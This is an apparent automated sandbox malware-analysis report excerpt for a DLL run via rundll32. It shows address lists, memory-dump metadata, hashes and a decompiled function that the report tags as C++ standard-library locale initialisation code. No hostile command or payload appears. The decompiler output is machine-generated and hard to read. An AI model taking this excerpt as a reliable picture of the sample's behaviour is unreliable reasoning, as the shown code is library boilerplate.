                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F9F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FA02
                          • int.LIBCPMT ref: 6E20FA19
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20FA3C
                          • std::_Facet_Register.LIBCPMT ref: 6E20FA53
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FA73
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FA91
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction ID: 25cf433e70bb9b3bbb59fe7f14114457af90a7abe063d505dcdecc3cddb429a5
                          • Opcode Fuzzy Hash: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction Fuzzy Hash: 6911E37990052E8BCF00DBE4CC94AEEB77BAF44B14F244908E4116B2D0DFB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F60D, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t506 - 0x14, 0);
				_t483 =  *0x6e2c6df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1E161C(0x6e2c6da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E2066BA(_t506 - 0x14);
					return E6E220075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E2111AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t506 - 0x20);
							E6E223D74(_t506 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t471, _t483, 0x14);
							E6E206653(_t506 - 0x14, 0);
							_t484 =  *0x6e2c6dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1E161C(0x6e2c6d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E2066BA(_t506 - 0x14);
								return E6E220075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E211230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t506 - 0x20);
										E6E223D74(_t506 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t358, _t472, _t484, 0x14);
										E6E206653(_t506 - 0x14, 0);
										_t485 =  *0x6e2c6dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1E161C(0x6e2c6d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E2066BA(_t506 - 0x14);
											return E6E220075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E2112B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t506 - 0x20);
													E6E223D74(_t506 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t358, _t473, _t485, 0x14);
													E6E206653(_t506 - 0x14, 0);
													_t486 =  *0x6e2c6dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1E161C(0x6e2c6d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E2066BA(_t506 - 0x14);
														return E6E220075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E211339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t506 - 0x20);
																E6E223D74(_t506 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t358, _t474, _t486, 0x14);
																E6E206653(_t506 - 0x14, 0);
																_t487 =  *0x6e2c6db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1E161C(0x6e2c6d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E2066BA(_t506 - 0x14);
																	return E6E220075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E2113A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t506 - 0x20);
																			E6E223D74(_t506 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t358, _t475, _t487, 0x14);
																			E6E206653(_t506 - 0x14, 0);
																			_t488 =  *0x6e2c6ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1E161C(0x6e2c6d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E2066BA(_t506 - 0x14);
																				return E6E220075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E211409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t506 - 0x20);
																						E6E223D74(_t506 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t358, _t476, _t488, 0x14);
																						E6E206653(_t506 - 0x14, 0);
																						_t489 =  *0x6e2c6de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1E161C(0x6e2c6d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E2066BA(_t506 - 0x14);
																							return E6E220075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E211471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t506 - 0x20);
																									E6E223D74(_t506 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t358, _t477, _t489, 0x14);
																									E6E206653(_t506 - 0x14, 0);
																									_t490 =  *0x6e2c6dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1E161C(0x6e2c6da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E2066BA(_t506 - 0x14);
																										return E6E220075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E2114EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t506 - 0x20);
																												E6E223D74(_t506 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t358, _t478, _t490, 0x14);
																												E6E206653(_t506 - 0x14, 0);
																												_t491 =  *0x6e2c6dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1E161C(0x6e2c6d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E2066BA(_t506 - 0x14);
																													return E6E220075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E211558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t506 - 0x20);
																															E6E223D74(_t506 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t358, _t479, _t491, 0x14);
																															E6E206653(_t506 - 0x14, 0);
																															_t492 =  *0x6e2c6e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1E161C(0x6e2c6dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E2066BA(_t506 - 0x14);
																																return E6E220075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E2115C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t506 - 0x20);
																																		E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t358, _t480, _t492, 0x14);
																																		E6E206653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e2c6dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1E161C(0x6e2c6d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E2066BA(_t506 - 0x14);
																																			return E6E220075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E21162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1E1438(_t435);
																																					E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e26851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e26c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E21542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E220075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E206FD3(__eflags, _t481);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e2c6dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E206FD3(__eflags, _t480);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e2c6e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E206FD3(__eflags, _t479);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e2c6dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E206FD3(__eflags, _t478);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e2c6dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E206FD3(__eflags, _t477);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e2c6de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E206FD3(__eflags, _t476);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e2c6ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E206FD3(__eflags, _t475);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e2c6db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E206FD3(__eflags, _t474);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e2c6dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E206FD3(__eflags, _t473);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e2c6dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E206FD3(__eflags, _t472);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e2c6dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E206FD3(__eflags, _t471);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e2c6df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}







































                          0x6e20f60d
                          0x6e20f60d
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f63e
                          0x6e20f643
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
